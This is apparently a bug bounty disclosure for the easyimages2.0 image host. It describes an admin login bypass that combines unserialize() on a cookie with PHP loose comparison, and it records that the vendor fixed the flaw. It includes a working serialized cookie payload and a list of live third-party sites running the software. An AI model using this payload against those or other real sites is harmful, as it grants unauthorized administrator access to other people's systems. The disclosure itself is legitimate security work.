Simple graph bed system has deserialization vulnerability and weak type comparison vulnerability in icret/easyimages2.0

Valid

Reported on

Mar 2nd 2023

Description

Simple graph bed has deserialization vulnerability and weak type comparison vulnerability

Proof of Concept

As you can see on line 129 below, there is a deserialization point and it is cookie passed The user controlled auth complex value in the cookie is given to the browser_cookie parameter Then the user can control the auth value in the cookie, satisfying the basic condition of deserialization (the user can control the deserialization parameters). The next step is to find the advantage

$$browser_cookie = unserialize($_COOKIE['auth']);

The user controlled auth complex value in the cookie is given to the browser_cookie parameter

if ($browser_cookie[0] == $config['user'] && $browser_cookie[1] == $config['password']) return  Json_encode (array (' code '= > 200,' level '= > 1,' messege '= >' respect of administrators'));

By comparing the deserialized value to the user name and password The user name and password are user and password in config In /config/config.php because

if ($browser_cookie[0] == $config['user'] && $browser_cookie[1] == $config['password']) return json_encode(array('code'  => 200, 'level' => 1, 'messege' => 'Esteemed Administrator '));
Is used in ==

php weak type comparison

So password is the md5 value, which is the string value

So we give the password in the cookie (which we can fake) a number of zeros

0 == 'e6e061838856bf47e1de730719fb2609'

Numeric type == Character type This is a permanent form

Therefore, the effect of unauthorized login can be achieved through deserialization + weak type comparison vulnerability

payload:

The value of auth in the construct cookie is

// PoC.js
auth=a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22admin%22%3Bi%3A1%3Bi%3A0%3B%7D

some exaples: https://pic.xmmup.com/ http://119.91.208.4/ https://pic.feixun.network/ http://42.194.169.37/ http://49.235.237.20/ http://124.223.203.248:8890/ http://47.98.184.192:8086 http://43.143.232.243:8080/ http://81.68.94.236:1025 http://img.143wu.top/

We access /admin/admin.inc.php with auth cookies

Impact

The PHP deserialization vulnerability, also known as PHP object Injection, allows users to control the auth parameter in cookies to achieve unauthorized administrator privileges

We are processing your report and will contact the icret/easyimages2.0 team within 24 hours. a month ago

We have contacted a member of the icret/easyimages2.0 team and are waiting to hear back a month ago

NCNIPC梅苑 modified the report

a month ago

NCNIPC梅苑

commented a month ago

Researcher

"==" is not secure in php and should be used "==="instead

icret validated this vulnerability a month ago

Thank you for your feedback. I hope you can continue to pay attention to the code. Thanks again!

NCNIPC梅苑 has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

icret marked this as fixed in 2.6.7 with commit 95a6ca a month ago

icret has been awarded the fix bounty

This vulnerability will not receive a CVE

icret published this vulnerability a month ago

to join this conversation